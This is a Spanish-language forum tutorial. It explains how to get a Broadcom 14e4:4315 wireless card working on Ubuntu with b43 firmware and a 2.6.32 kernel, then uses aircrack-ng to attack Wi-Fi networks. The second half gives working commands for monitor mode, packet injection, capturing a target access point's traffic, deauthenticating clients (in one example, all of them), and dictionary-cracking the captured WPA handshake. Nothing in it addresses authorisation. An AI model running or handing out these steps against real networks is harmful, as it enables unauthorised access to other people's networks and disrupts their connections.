1. Verificar PCI ID
Ejecuta este comando en una terminal para saber si tu tarjeta es compatible con este proceso.
Código:
lspci -nn
Si al lado de tu tarjeta se encuentra esto: [14e4:4315], puedes seguir el tuto .
2. Elementos necesarios
2.1 git-core > Se instala desde el Gestor de paquetes Synaptic
2.2 Ubuntu > No he probado en otro distro
2.3 Kernel 2.6.32-x > Mas informacion abajo
2.4 aircrack-ng > Se instala desde el Gestor de paquetes Synaptic
3. Descargando el Kernel 2.6.32
3.1 Descarga esto Linux-headers-2.6.32-020632_2.6.32-020632_all.deb
3.2 Descarga tu kernel headers package:
I386: linux-headers-2.6.32-020632-generic_2.6.32-020632_i386.deb
AMD64: linux-headers-2.6.32-020632-generic_2.6.32-020632_amd64.deb
3.3 Descarga el kernel compilado:
I386: linux-image-2.6.32-020632-generic_2.6.32-020632_i386.deb
AMD64: linux-image-2.6.32-020632-generic_2.6.32-020632_amd64.deb
3.4 Instalalos en este orden:
- linux-headers-2.6.32-020632_2.6.32-020632_all.deb
- I386: linux-headers-2.6.32-020632-generic_2.6.32-020632_i386.deb O
AMD64: linux-headers-2.6.32-020632-generic_2.6.32-020632_amd64.deb - I386: linux-image-2.6.32-020632-generic_2.6.32-020632_i386.deb O
AMD64: linux-image-2.6.32-020632-generic_2.6.32-020632_amd64.deb
NOTA: Puedes usar cualquier kernel del 2.6.32 hacia adelante no hay problema.
3.5 En la terminal ejecuta: (por si las moscas)
Código:
sudo update-grub
3.6 Reinicia y selecciona el kernel 2.6.32 desde el GRUB
4. Preparacion
Código:
git clone http://git.bu3sch.de/git/b43-tools.git
cd b43-tools/fwcutter
make
cd ../../
4.1 Descargar el firmware:
Código:
wget http://downloads.openwrt.org/sources/broadcom-wl-4.178.10.4.tar.bz2
tar xjf broadcom-wl-4.178.10.4.tar.bz2
5. Instalar el firmware:
Código:
cd broadcom-wl-4.178.10.4/linux
sudo ../../b43-tools/fwcutter/b43-fwcutter -w ../../../../DIRECTORIO_DE_LOS_FIMWARES wl_apsta.o
!LISTO!
6. !A probar la tarjeta!:
6.1 Modo monitor
Código:
airmon-ng start wlan0
6.2 Aireplay ataque 9
Código:
aireplay-ng -9 mon0
6.3 Capturando paquetes
Código:
airodump-ng -c CANAL_DEL_AP --bssid MAC_DEL_AP -w ARCHIVO_A_GUARDAR mon0
EJEMPLO: airodump-ng -c 4 --bssid 00:1B:5B:A3:85:D1 -w miap mon0
6.4 Desconectar a un cliente(Ataque 0) y capturar el handshake
Código:
aireplay-ng -0 1 -a MAC_DEL_AP -c MAC_CLIENTE mon0
EJEMPLO: aireplay-ng -0 1 -a 00:1B:5B:A3:85:D1 mon0 <Desconecta a todos
6.5 Crackear el handshake
Código:
aircrack-ng -w DIRECTORIO_DICCIONARIO NOMBRE_DEL_ARCHIVO_CAPTURADOR*.cap
EJEMPLO: aircrack-ng -w /aircrack/password.lst miap*.cap <Se debe de poner el *
!LISTO!
Bueno esto es todo espero que los haya ayudado y si tienen dudas pregunten y hare lo que pueda.
Creditos: p0k0 y a las comunidades de seguiridadwireless y elhacker.